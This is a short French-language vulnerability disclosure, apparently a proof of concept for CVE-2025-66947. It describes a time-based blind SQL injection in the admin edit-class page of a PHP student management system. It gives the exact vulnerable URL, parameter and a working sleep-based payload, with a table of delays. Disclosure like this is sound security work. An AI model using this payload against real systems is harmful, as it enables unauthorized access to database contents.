
Preuve de concept pour une injection SQL aveugle basée sur le temps dans un panneau d'administration PHP. Démontre l'exploitation via un paramètre GET non assaini, avec des conseils d'atténuation pour un usage défensif.
⏱️ Comparaison visuelle : réponse normale vs réponse retardée de ~6s
TL;DR : Un paramètre GET dans un module d'administration permet une injection SQL basée sur le temps via des délais de réponse.
Une vulnérabilité d'injection SQL aveugle basée sur le temps existe dans krishanmuraiji SMS v1.0 en raison d'une validation inadéquate d'un paramètre GET dans un module d'administration.
/studentms/admin/edit-class-detail.phpeditid (GET)/studentms/admin/edit-class-detail.php?editid=12
/studentms/admin/edit-class-detail.php?editid=12*if(now()=sysdate(),sleep(6),0)
| Charge utile | Délai |
|---|---|
sleep(3) | ~3s |
sleep(6) | ~6s |
sleep(15) | ~15s |
Un délai constant = Injection SQL confirmée
Ce modèle de vulnérabilité apparaît couramment dans :
Même lorsque l'authentification est requise et que les erreurs sont masquées,
L'injection SQL basée sur le temps reste exploitable et dangereuse.
Sévérité : Élevée
CVE-2025-66947
Ranjan KumarCette preuve de concept est fournie à des fins éducatives et défensives uniquement.
CVE-2025-66947, Injection SQL, Injection SQL aveugle basée sur le temps, PHP, Panneau d'administration